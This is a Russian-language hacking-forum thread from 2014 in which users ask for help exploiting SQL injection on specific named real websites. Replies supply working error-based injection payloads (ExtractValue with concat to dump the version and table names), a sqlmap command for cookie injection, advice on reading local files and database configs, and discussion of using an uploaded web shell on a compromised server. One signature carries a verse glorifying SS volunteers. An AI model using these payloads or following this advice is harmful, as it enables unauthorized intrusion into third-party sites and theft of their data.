10.09.2014, 16:18
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от Br@!ns
_http://www.moysvet.ru/catalog/view/118876' помогите раскрутить, всю голову сломал уже.
http://www.moysvet.ru/catalog/view/118876'or(ExtractValue(1,concat(0x3a,(select(versi on())))))='1
|
|
|
10.09.2014, 16:57
|
|
Участник форума
Регистрация: 20.05.2008
Сообщений: 144
С нами:
9461186
Репутация:
171
|
|
Помогите раскрутить скулю
Сообщение от None
http://www.stu.lipetsk.ru/announcements/7595'/
|
|
|
|
10.09.2014, 17:20
|
|
Новичок
Регистрация: 10.09.2006
Сообщений: 6
С нами:
10351032
Репутация:
0
|
|
Есть участок кода на чужом сайте:
Содержимое http://site.ru я могу редактировать, то есть в переменной $data подконтрольный текст и он выводится на стороннем сайте.
Какая тут уязвимость, возможно ли выполнение произвольного кода или создание php файла на сервере или тут только XSS?
. |
|
|
|
10.09.2014, 17:23
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от Inkognito2008
Есть участок кода на чужом сайте:
Содержимое http://site.ru я могу редактировать, то есть в переменной $data подконтрольный текст и он выводится на стороннем сайте.
Какая тут уязвимость, возможно ли выполнение произвольного кода или создание php файла на сервере или тут только XSS? Можешь попробовать заюзать как локальную читалку! eval реализовать не получится, так как вывод через echo $data;
Ищи конфиги БД и пробуй подключиться!
|
|
|
|
10.09.2014, 17:26
|
|
Новичок
Регистрация: 10.09.2006
Сообщений: 6
С нами:
10351032
Репутация:
0
|
|
Сообщение от winstrool
Ищи конфиги БД и пробуй подключиться!
Сайт без БД, то есть код выполнить никак нельзя?
Если говорить точнее то вывод идет через:
Код:
$GLOBALS['_RESULT']=array( "otvet" => "тут строка моя" ); exit;
Вывод подхватывается JS и выводится на сайте.
|
|
|
|
10.09.2014, 17:48
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от Inkognito2008
Сайт без БД, то есть код выполнить никак нельзя?
Если говорить точнее то вывод идет через:
Код:
$GLOBALS['_RESULT']=array( "otvet" => "тут строка моя" ); exit;
Вывод подхватывается JS и выводится на сайте. тогда ищи уязвимости в функциях и пробуй их реализовать, можно еще попробовать сайты соседей посмотреть...
|
|
|
|
10.09.2014, 19:20
|
|
Познающий
Регистрация: 15.09.2013
Сообщений: 68
С нами:
6662486
Репутация:
0
|
|
Помогите составить запрос в sqlmap на sql inj cookie
sqlmap.py -u "http://site:.com/index.php" --cookie="cacheSession=*" --random-agent --level=2 --risk=1
верно? Он то показывает блинд , то нет
|
|
|
|
10.09.2014, 21:34
|
|
Новичок
Регистрация: 19.10.2013
Сообщений: 4
С нами:
6613526
Репутация:
0
|
|
Сообщение от winstrool
во вкладке [SQL] вводишь данные для подключения к БД, там появляется консоль, в ней уже вводишь команды для создание БД, почитай справочник _ttp://www.mysql.ru/docs/man/Database_use.html полезно будет!
допустим через админку я залил шелл, ввел данные для подключения к БД данного сайта, зашел, появилась консоль в ней я могу создать новую базу данных(чистую) не затрагивая уже существующую и создать на серваке еще один сайт?
|
|
|
|
11.09.2014, 18:30
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Помогите раскрутить
Код HTML:
http://www.svetodom.ru/brand/jhkhjkhjk
http://www.svetodom.ru/brand/jhkhjkhjk+AND
|
|
|
|
11.09.2014, 18:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Сообщение от Br@!ns
Помогите раскрутить
Код HTML:
http://www.svetodom.ru/brand/jhkhjkhjk
http://www.svetodom.ru/brand/jhkhjkhjk+AND
а что сложного использовать error-based?
например ExtractValue
Сообщение от None
1 and ExtractValue(1,concat(0x5c,((select+table_name+fro m+information_schema.tables+limit+30,1))))+--+
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Комбинированный вид
